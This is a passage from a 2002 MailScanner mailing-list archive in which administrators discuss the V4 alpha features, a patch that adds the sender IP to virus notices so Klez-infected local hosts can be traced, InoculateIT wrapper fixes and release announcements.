altogether >> "bounce" it back to the sender by sending them a warning message >> "forward" it to any other email addresses >> >>- Completely separate set of actions can be used when the message scores >> above a certain SpamAssassin "High Score" threshold >> >>- Mail for any group of users can be archived to a directory or forwarded >> onto another address. The original recipient should not be able to >> detect this has happened, if you choose not to tell them >> >>- Spam whitelists and blacklists can be far more complex than before, if >> you need them to be >> >>- Not only can you choose a list of addresses whose mail you want to scan, >> you can also choose a list of addresses whose mail you do not want to >>scan >> >>- You can choose not to run SpamAssassin on messages that have already >> triggered an RBL blacklist >> >>-- >>Julian Field Teaching Systems Manager >>jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >>Tel. 023 8059 2817 University of Southampton >> Southampton SO17 1BJ > > >-- > >Regards >Brandon Friedman >Cell:083 408 7840 >E-mail: brandonf@bfconsult.co.za >www.bfconsult.co.za -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jim at ENTROPHY-FREE.NET Fri Sep 20 18:37:38 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:43 2006 Subject: What's New in V4 alpha 1 In-Reply-To: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> Message-ID: <1032543459.1966.8.camel@wilowisp.dynetics.com> On Fri, 2002-09-20 at 11:30, Julian Field wrote: > Here's the "What's New" list. It may not be complete, and some of the > features are far more flexible than I can give space to here, but it should > give you a flavour of what is new in this release. > > - Completely redesigned and rewritten from scratch > First look comment... pretty spiffy! More after a bit more testing. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From hciss at HCIWS.COM Fri Sep 20 18:56:40 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet Message-ID: <007701c260cf$1596db20$6701a8c0@matthew> W32/Klez.H@mm is getting to be a real pain. I understand it lies about the email address it comes for its own protection. I wondered if there is a way to have Mailscanner send me an alert everytime a certain virus(this one in particuliar) orginates from an IP in my subnet. That way, even if it lied about the email address I could look up in my logs to see who had that IP and tell them to clean there system. Another way that could work. "Warning: E-mail viruses detected" could be changed too: "Warning: E-mail viruses detected *local-origin*" Is that viable? Matthew H From hciss at HCIWS.COM Fri Sep 20 19:00:11 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:43 2006 Subject: Spam Tagging Suggestion References: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> Message-ID: <008501c260cf$9334c100$6701a8c0@matthew> > This is in V4. Perhaps the tag could be a text file attachment. Would that be less obtrussive? Mailscanner already does a lot of that. Matt > >-- > >MailScanner Scanned > >SpamAssassin - - - - - 5 hits. > > > >If 12 hits its tagged like so: > > > >-- > >MailScanner Scanned > >SpamAssassin - - - - - - - - - - - - 12 hits. From munafo at PREZZEMOLO.POLITO.IT Fri Sep 20 19:00:10 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet In-Reply-To: <007701c260cf$1596db20$6701a8c0@matthew> References: <007701c260cf$1596db20$6701a8c0@matthew> Message-ID: <02092020001009.03437@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 20 September 2002 19:56, Matt wrote: > W32/Klez.H@mm is getting to be a real pain. > > I understand it lies about the email address it comes for its own > protection. I wondered if there is a way to have Mailscanner send me an > alert everytime a certain virus(this one in particuliar) orginates from an > IP in my subnet. That way, even if it lied about the email address I could > look up in my logs to see who had that IP and tell them to clean there > system. > > Another way that could work. > > "Warning: E-mail viruses detected" could be changed too: "Warning: E-mail > viruses detected *local-origin*" > > Is that viable? > Actually you ask Mailscanner to include the full header in the message to postmaster, so you can at least verify later if any of the message is locally generated (the last among the Received: headers should be the one to be examined). Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9i2IqtgCCNnfQWWkRAh4VAJsFrTz7AChv/vhTVIrECVtVVFoGMQCfZ0+0 HMmgEPRQCXNZy3CcqfiZy/4= =pgwU -----END PGP SIGNATURE----- From email at ace.net.au Fri Sep 20 18:58:28 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:43 2006 Subject: What's New in V4 alpha 1 In-Reply-To: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> Message-ID: <200209210328280198.1FC90DFB@smtp1.ace.net.au> Will it be possible to add scanners after install? Peter *********** REPLY SEPARATOR *********** On 20/09/2002 at 5:30 PM Julian Field wrote: >Here's the "What's New" list. It may not be complete, and some of the >features are far more flexible than I can give space to here, but it should >give you a flavour of what is new in this release. > >- Completely redesigned and rewritten from scratch > >- Multiple concurrent scanning processes makes it run much faster as all > the CPU's in the server can be fully loaded at all times > >- Virtually all configuration options can have their value calculated from > a ruleset allowing you to set different values depending on the From: > address, the To: address or the IP address of the computer sending you > the message > >- Support for 12 virus scanners: > Sophos, McAfee, Command, Kaspersky, Inoculate, Inoculan, Nod32, >F-Secure, > F-Prot, Panda, RAV and AntiVir. > >- Can report messages back to people who sent you spam, explaining what > detected it as spam. Different messages depending on whether it >triggered > an RBL, SpamAssassin or both. > >- Complete hiding of directory paths in virus reports sent to users, so > as not to confuse them or give away configuration information about your > servers > >- A header can be added to every message indicating the SpamAssassin score > by giving 1 character per point, so a message with a score of 7 would > contain "sssssss" in the header (the character is configurable). > >- Notices about viruses no longer have to go to the local postmaster, they > can go to any address > >- All messages sent back to senders are created so that they cannot bounce, > but can be replied to > >- Messages already signed as being clean will not be re-signed by another > MailScanner server on your site (but they will still be scanned) > >- Actions to take when a message is detected as being spam include any > combination of > "deliver" it to the intended recipient as normal > "store" it in the spam archive > "delete" it altogether > "bounce" it back to the sender by sending them a warning message > "forward" it to any other email addresses > >- Completely separate set of actions can be used when the message scores > above a certain SpamAssassin "High Score" threshold > >- Mail for any group of users can be archived to a directory or forwarded > onto another address. The original recipient should not be able to > detect this has happened, if you choose not to tell them > >- Spam whitelists and blacklists can be far more complex than before, if > you need them to be > >- Not only can you choose a list of addresses whose mail you want to scan, > you can also choose a list of addresses whose mail you do not want to >scan > >- You can choose not to run SpamAssassin on messages that have already > triggered an RBL blacklist > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ From munafo at PREZZEMOLO.POLITO.IT Fri Sep 20 19:02:47 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet In-Reply-To: <02092020001009.03437@prezzemolo.polito.it> References: <007701c260cf$1596db20$6701a8c0@matthew> <02092020001009.03437@prezzemolo.polito.it> Message-ID: <0209202002470B.03437@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 20 September 2002 20:00, Maurizio Matteo Munafo' wrote: > > Actually you ask Mailscanner to include the full header in the message to Sorry. A verb missing :) You *can* ask... M. - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9i2LHtgCCNnfQWWkRAoEdAJ4in2xcJajSzJ94BgBdmWawWaWKlQCfWt88 QdbKr9YIViS+NxftH8XbtH4= =0274 -----END PGP SIGNATURE----- From mailscanner at ecs.soton.ac.uk Fri Sep 20 19:12:23 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet In-Reply-To: <007701c260cf$1596db20$6701a8c0@matthew> Message-ID: <5.1.0.14.2.20020920190113.036f5d48@imap.ecs.soton.ac.uk> Would addint the IP address to the contents of the virus notice do the job? Then you can just filter all messages containing an IP address you own into another mailbox. That should be an easy change. Here are patches for V4 and the latest V3 (though you should be able to apply it to pretty old versions too). The patch for V4 is this: --- Message.pm.old Fri Sep 20 08:55:05 2002 +++ Message.pm Fri Sep 20 19:17:10 2002 @@ -1484,15 +1484,17 @@ my $to = join(', ', @{$this->{to}}); my $subj = $this->{subject}; my $rept = join(' Report: ', values %{$this->{allreports}}); + my $ip = $this->{clientip}; my($result, $headers); $result = "\n" . - " Sender: $from\n" . - "Recipient: $to\n" . - " Subject: $subj\n" . - "MessageID: $id\n" . - " Report: $rept\n"; + " Sender: $from\n" . + "IP Address: $ip\n" . + " Recipient: $to\n" . + " Subject: $subj\n" . + " MessageID: $id\n" . + " Report: $rept\n"; if (MailScanner::Config::Value('noticefullheaders', $this)) { $headers = join("\n ", @{$this->{headers}}); And the patch for V3 is this: --- sendmail.pl.old Wed Aug 28 14:17:22 2002 +++ sendmail.pl Fri Sep 20 19:19:53 2002 @@ -1394,11 +1394,12 @@ print SENDMAIL <W32/Klez.H@mm is getting to be a real pain. > >I understand it lies about the email address it comes for its own >protection. I wondered if there is a way to have Mailscanner send me an >alert everytime a certain virus(this one in particuliar) orginates from an >IP in my subnet. That way, even if it lied about the email address I could >look up in my logs to see who had that IP and tell them to clean there >system. > >Another way that could work. > >"Warning: E-mail viruses detected" could be changed too: "Warning: E-mail >viruses detected *local-origin*" > >Is that viable? > >Matthew H -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 19:15:12 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Spam Tagging Suggestion In-Reply-To: <008501c260cf$9334c100$6701a8c0@matthew> References: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020920191449.036df578@imap.ecs.soton.ac.uk> At 19:00 20/09/2002, you wrote: > > This is in V4. > >Perhaps the tag could be a text file attachment. Would that be less >obtrussive? Mailscanner already does a lot of that. It's a new header. Just what they are there for :-) >Matt > > > >-- > > >MailScanner Scanned > > >SpamAssassin - - - - - 5 hits. > > > > > >If 12 hits its tagged like so: > > > > > >-- > > >MailScanner Scanned > > >SpamAssassin - - - - - - - - - - - - 12 hits. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 19:13:53 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: What's New in V4 alpha 1 In-Reply-To: <200209210328280198.1FC90DFB@smtp1.ace.net.au> References: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020920191332.023bbf50@imap.ecs.soton.ac.uk> At 18:58 20/09/2002, you wrote: >Will it be possible to add scanners after install? Don't quite understand your question. >Peter > >*********** REPLY SEPARATOR *********** > >On 20/09/2002 at 5:30 PM Julian Field wrote: > > >Here's the "What's New" list. It may not be complete, and some of the > >features are far more flexible than I can give space to here, but it >should > >give you a flavour of what is new in this release. > > > >- Completely redesigned and rewritten from scratch > > > >- Multiple concurrent scanning processes makes it run much faster as all > > the CPU's in the server can be fully loaded at all times > > > >- Virtually all configuration options can have their value calculated from > > a ruleset allowing you to set different values depending on the From: > > address, the To: address or the IP address of the computer sending you > > the message > > > >- Support for 12 virus scanners: > > Sophos, McAfee, Command, Kaspersky, Inoculate, Inoculan, Nod32, > >F-Secure, > > F-Prot, Panda, RAV and AntiVir. > > > >- Can report messages back to people who sent you spam, explaining what > > detected it as spam. Different messages depending on whether it > >triggered > > an RBL, SpamAssassin or both. > > > >- Complete hiding of directory paths in virus reports sent to users, so > > as not to confuse them or give away configuration information about >your > > servers > > > >- A header can be added to every message indicating the SpamAssassin score > > by giving 1 character per point, so a message with a score of 7 would > > contain "sssssss" in the header (the character is configurable). > > > >- Notices about viruses no longer have to go to the local postmaster, they > > can go to any address > > > >- All messages sent back to senders are created so that they cannot >bounce, > > but can be replied to > > > >- Messages already signed as being clean will not be re-signed by another > > MailScanner server on your site (but they will still be scanned) > > > >- Actions to take when a message is detected as being spam include any > > combination of > > "deliver" it to the intended recipient as normal > > "store" it in the spam archive > > "delete" it altogether > > "bounce" it back to the sender by sending them a warning message > > "forward" it to any other email addresses > > > >- Completely separate set of actions can be used when the message scores > > above a certain SpamAssassin "High Score" threshold > > > >- Mail for any group of users can be archived to a directory or forwarded > > onto another address. The original recipient should not be able to > > detect this has happened, if you choose not to tell them > > > >- Spam whitelists and blacklists can be far more complex than before, if > > you need them to be > > > >- Not only can you choose a list of addresses whose mail you want to scan, > > you can also choose a list of addresses whose mail you do not want to > >scan > > > >- You can choose not to run SpamAssassin on messages that have already > > triggered an RBL blacklist > > > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From gdr at GNO.ORG Fri Sep 20 19:14:52 2002 From: gdr at GNO.ORG (Devin Reade) Date: Thu Jan 12 21:15:43 2006 Subject: Spam Tagging Suggestion In-Reply-To: <008501c260cf$9334c100$6701a8c0@matthew> References: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> <008501c260cf$9334c100$6701a8c0@matthew> Message-ID: <14620000.1032545691@kzin.interdynamix.com> Matt wrote: > Perhaps the tag could be a text file attachment. Would that be less > obtrussive? Mailscanner already does a lot of that. I would say that is *more* obtrussive, so if it were done I would hope that it is configurable. -- Devin Reade From mailscanner at ecs.soton.ac.uk Fri Sep 20 19:16:43 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet In-Reply-To: <0209202002470B.03437@prezzemolo.polito.it> References: <02092020001009.03437@prezzemolo.polito.it> <007701c260cf$1596db20$6701a8c0@matthew> <02092020001009.03437@prezzemolo.polito.it> Message-ID: <5.1.0.14.2.20020920191549.0246a628@imap.ecs.soton.ac.uk> At 19:02 20/09/2002, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >On Friday 20 September 2002 20:00, Maurizio Matteo Munafo' wrote: > > > > Actually you ask Mailscanner to include the full header in the message to > >Sorry. A verb missing :) >You *can* ask... But not very easy to automatically filter and process. Try my patch instead, dead simple solution to the problem. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From munafo at PREZZEMOLO.POLITO.IT Fri Sep 20 19:24:15 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet In-Reply-To: <5.1.0.14.2.20020920191549.0246a628@imap.ecs.soton.ac.uk> References: <02092020001009.03437@prezzemolo.polito.it> <5.1.0.14.2.20020920191549.0246a628@imap.ecs.soton.ac.uk> Message-ID: <0209202024150D.03437@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 20 September 2002 20:16, Julian Field wrote: > At 19:02 20/09/2002, you wrote: > >-----BEGIN PGP SIGNED MESSAGE----- > >Hash: SHA1 > > > >On Friday 20 September 2002 20:00, Maurizio Matteo Munafo' wrote: > > > Actually you ask Mailscanner to include the full header in the message > > > to > > > >Sorry. A verb missing :) > >You *can* ask... > > But not very easy to automatically filter and process. Try my patch > instead, dead simple solution to the problem. Certainly. Actually I was thinking to offline batch postprocessing, using some kind of script. Just to verify the feasibility, in the last 10 minutes I wrote a perl program to extract that information from a folder containing the virus warning to the postmaster and it seems to work. :) Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9i2fPtgCCNnfQWWkRAqMHAJ9CrvVJQSIDYzQDksn2HT0tB3m0VwCggn4j Ak6a2WOzj2Gqu9/SWU0CEg0= =3fOm -----END PGP SIGNATURE----- From LISTSERV at JISCMAIL.AC.UK Fri Sep 20 19:48:30 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:43 2006 Subject: MAILSCANNER: webmaster@CROSSPOINTCHINESE.COM requested to join Message-ID: <200209201848.TAA04307@magpie.ecs.soton.ac.uk> Fri, 20 Sep 2002 19:48:30 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Crosspoint Webmaster . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER webmaster@CROSSPOINTCHINESE.COM Crosspoint Webmaster The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+webmaster%40CROSSPOINTCHINESE.COM+Crosspoint+Webmaster&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Sat Sep 21 12:48:10 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: GFI Email Security Tests Message-ID: <5.1.0.14.2.20020921123928.0434c9a8@imap.ecs.soton.ac.uk> At http://www.gfi.com/emailsecuritytest there is a little bunch of tests which attack known Microsoft-specific vulnerabilities. They don't include various other attacks such as Eudora problems (which MailScanner already checks for). However, I bet some people are using it as a yardstick to compare email security systems. Although MailScanner is primarily an anti *virus* system, it does include tests for known security vulnerabilities as well. So I have added tests for all the problems listed by GFI in their tests. MailScanner passes many of the tests anyway due to filename checks, but it now should pass all the tests. If I was a marketing droid, at this point I would start carping on about enterprise-scale complete e-mail security solutions, as opposed to merely virus-scanning. But fortunately I'm not. However, it does make MailScanner more of a "complete" solution to the problem of nasty email. Can someone confirm it on their systems please? I have tested it here and it appears to work fine, but I would appreciate a test by someone else. Drop me a line and I'll mail you the files for V3.22-14 and/or V4.00.0a1. Once that's done I'll release 3.22-15 (and will happily mail the file for V4 to anyone who wants it). -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From rabollinger at ATTBI.COM Sun Sep 22 02:10:41 2002 From: rabollinger at ATTBI.COM (Richard Bollinger) Date: Thu Jan 12 21:15:43 2006 Subject: Post the files for v3.22-14 and we'll try 'em (gfi.com's test) Message-ID: <009b01c261d4$debc5240$0211a8c0@rbw02> I've tried their tests already... some stuff gets through now... luckily I've got a well patched outlook client! Happy to test your patches / overlay. Rich B From rabollinger at attbi.com Sun Sep 22 02:10:41 2002 From: rabollinger at attbi.com (Richard Bollinger) Date: Thu Jan 12 21:15:43 2006 Subject: Post the files for v3.22-14 and we'll try 'em (gfi.com's test) Message-ID: <009b01c261d4$debc5240$0211a8c0@rbw02> I've tried their tests already... some stuff gets through now... luckily I've got a well patched outlook client! Happy to test your patches / overlay. Rich B From james at un.net.au Sun Sep 22 03:49:09 2002 From: james at un.net.au (James Murchison) Date: Thu Jan 12 21:15:43 2006 Subject: InoculateIT and Mailscanner In-Reply-To: <008801c26083$99e5c630$8500a8c0@xyz> Message-ID: <000401c261e2$9ff14e90$6401a8c0@jamesdesktop> Hello Ian, Thanks for taking an interest in my problem. Original I wasn't using a wrapper, I modified the F-prot wrapper to suit InoculateIT. The error message no longer comes up, but the wrapper seems to hang when run. Also I am now having a problem with Denial of Service attack. Every message that is HTML format gets stripped. Can you give me look at your wrapper script? KR James. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Ian Ee Sent: Friday, 20 September 2002 6:56 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: InoculateIT and Mailscanner Hi James, I've got InoculateIT and Mailscanner to run correctly RH7.3 by making some changes to the wrapper script and creating a symbolic link. 1. Edit the wrapper script (mine is called inowrapper, f-prot user will have this as f-protwrapper), uncomment the option header "LD_LIBRARY_PATH=" and "export LD_LIBRARY_PATH" so it look something like this: LD_LIBRARY_PATH=/ino/lib:/ino/config:/ino/secu/lib export LD_LIBRARY_PATH 2. Create symbolic link for file /ino/config/libarclib.so in /ino/lib This tweak has got my production server up and running again, I guess RH7.3 works different. Kind regards, Ian. ----- Original Message ----- From: "James Murchison" To: Sent: Friday, September 20, 2002 3:56 PM Subject: Re: InoculateIT and Mailscanner > Nick, > > Firstly thanks for taking an interest in my problem. I think if I can > get Mailscanner to run as root, this will fix my problem. Any hints > you know of?? > > See below for other answers. > > On Fri, Sep 20, 2002 at 09:16:44AM +1000, James Murchison wrote: > > > I have been running Mailscanner for 12 Months on RedHat 7.0 with > > InoculateIT no problems. Recently we introduced a new mail server, > > Redhat 7.3 and InoculteIT 6.0. I have the latest version (3.22-14) > > of Mailscanner installed. I am having an issue with INO6.0, it comes > > up with a libarclib shared library problem when the sweep is run. > > What's the exact problem/error message/output? > > The exact error is : error in loading shared libraries: libarclib.so: > cannot open shared object file: No Such file or directory I was able > to duplicate this error by logging in as a non root user. Then running > the command (inocmd32). As soon as I logged in as root the problem > goes away. > > The exact problem is : When the virus scanner is invoked it returns > the above error, then proceeds to continue processing without scanning > for viruses. > > > I have visted the mailing lists and seen there are numerous people > > who > > > have addressed this problem with AMVIS (InoculateIT will not accept > > anything, but the root user). I have tried to adapt to Mailscanner > > with no success. > > You mean Inoculate won't run *at all* unless it's root? By design? Or > just by accident? > > By design.... CA have advised this will not change. [JM] > > What use are you running mailscanner as? > > I use Mailscanner to prescan multiple email domains for viruses and > filtering certain file types. [JM] > > > > What user does the sweep command use? can you help ?? > > Whatever you are running mailscanner as. > > Another stupid question .... How do I change this?? > > > HTH > > > Nick > -- > Nick Phillips -- nwp@lemon-computing.com > You are not dead yet. But watch for further reports. > From james at un.net.au Sun Sep 22 04:51:14 2002 From: james at un.net.au (James Murchison) Date: Thu Jan 12 21:15:43 2006 Subject: InoculateIT and Mailscanner In-Reply-To: <008801c26083$99e5c630$8500a8c0@xyz> Message-ID: <002501c261eb$4ce1caf0$6401a8c0@jamesdesktop> It works like a charm !! Thanks for your help talk next time. I was editing the script through a samba share via windows. DON'T DO IT ! KR James. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Ian Ee Sent: Friday, 20 September 2002 6:56 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: InoculateIT and Mailscanner Hi James, I've got InoculateIT and Mailscanner to run correctly RH7.3 by making some changes to the wrapper script and creating a symbolic link. 1. Edit the wrapper script (mine is called inowrapper, f-prot user will have this as f-protwrapper), uncomment the option header "LD_LIBRARY_PATH=" and "export LD_LIBRARY_PATH" so it look something like this: LD_LIBRARY_PATH=/ino/lib:/ino/config:/ino/secu/lib export LD_LIBRARY_PATH 2. Create symbolic link for file /ino/config/libarclib.so in /ino/lib This tweak has got my production server up and running again, I guess RH7.3 works different. Kind regards, Ian. ----- Original Message ----- From: "James Murchison" To: Sent: Friday, September 20, 2002 3:56 PM Subject: Re: InoculateIT and Mailscanner > Nick, > > Firstly thanks for taking an interest in my problem. I think if I can > get Mailscanner to run as root, this will fix my problem. Any hints > you know of?? > > See below for other answers. > > On Fri, Sep 20, 2002 at 09:16:44AM +1000, James Murchison wrote: > > > I have been running Mailscanner for 12 Months on RedHat 7.0 with > > InoculateIT no problems. Recently we introduced a new mail server, > > Redhat 7.3 and InoculteIT 6.0. I have the latest version (3.22-14) > > of Mailscanner installed. I am having an issue with INO6.0, it comes > > up with a libarclib shared library problem when the sweep is run. > > What's the exact problem/error message/output? > > The exact error is : error in loading shared libraries: libarclib.so: > cannot open shared object file: No Such file or directory I was able > to duplicate this error by logging in as a non root user. Then running > the command (inocmd32). As soon as I logged in as root the problem > goes away. > > The exact problem is : When the virus scanner is invoked it returns > the above error, then proceeds to continue processing without scanning > for viruses. > > > I have visted the mailing lists and seen there are numerous people > > who > > > have addressed this problem with AMVIS (InoculateIT will not accept > > anything, but the root user). I have tried to adapt to Mailscanner > > with no success. > > You mean Inoculate won't run *at all* unless it's root? By design? Or > just by accident? > > By design.... CA have advised this will not change. [JM] > > What use are you running mailscanner as? > > I use Mailscanner to prescan multiple email domains for viruses and > filtering certain file types. [JM] > > > > What user does the sweep command use? can you help ?? > > Whatever you are running mailscanner as. > > Another stupid question .... How do I change this?? > > > HTH > > > Nick > -- > Nick Phillips -- nwp@lemon-computing.com > You are not dead yet. But watch for further reports. > From mailscanner at ecs.soton.ac.uk Sun Sep 22 13:33:19 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 Message-ID: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> I have just released version 3.23-1 and its equivalent V4 version. I have added traps for all known Outlook, IE and Eudora security vulnerabilities, and MailScanner now catches all of the GFI email security tests. This makes MailScanner a complete e-mail security system, rather than just being a virus scanner. See http://www.gfi.com/emailsecuritytest for information about these tests. Fixed a bug where the "domains.to.archive.conf" file would ignore complete e-mail addresses containing a '.' before a '@'. Also fixed the obvious bug in the V4 check_mailscanner script which forced you to be in the right directory when you ran check_mailscanner :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sun Sep 22 13:31:26 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Post the files for v3.22-14 and we'll try 'em (gfi.com's test) In-Reply-To: <009b01c261d4$debc5240$0211a8c0@rbw02> Message-ID: <5.1.0.14.2.20020922133054.0251fd78@imap.ecs.soton.ac.uk> At 02:10 22/09/2002, you wrote: >I've tried their tests already... some stuff gets through now... luckily >I've got a well patched >outlook client! Happy to test your patches / overlay. Someone else has already tested them for me, and we concur that they all work fine. Thanks for the offer anyway! -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at CAMAROSS.NET Sun Sep 22 13:54:52 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:43 2006 Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 In-Reply-To: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: <00dc01c26237$40c80990$6501a8c0@mikedesk> Julian, Getting a 404 on the V4 download. Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Sunday, September 22, 2002 7:33 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 I have just released version 3.23-1 and its equivalent V4 version. I have added traps for all known Outlook, IE and Eudora security vulnerabilities, and MailScanner now catches all of the GFI email security tests. This makes MailScanner a complete e-mail security system, rather than just being a virus scanner. See http://www.gfi.com/emailsecuritytest for information about these tests. Fixed a bug where the "domains.to.archive.conf" file would ignore complete e-mail addresses containing a '.' before a '@'. Also fixed the obvious bug in the V4 check_mailscanner script which forced you to be in the right directory when you ran check_mailscanner :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From joe at QITC.CO.UK Sun Sep 22 14:06:52 2002 From: joe at QITC.CO.UK (Joe Quinn) Date: Thu Jan 12 21:15:43 2006 Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 References: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: <055d01c26238$ec0f9510$ee720550@T20> I just updated to 3.23-1 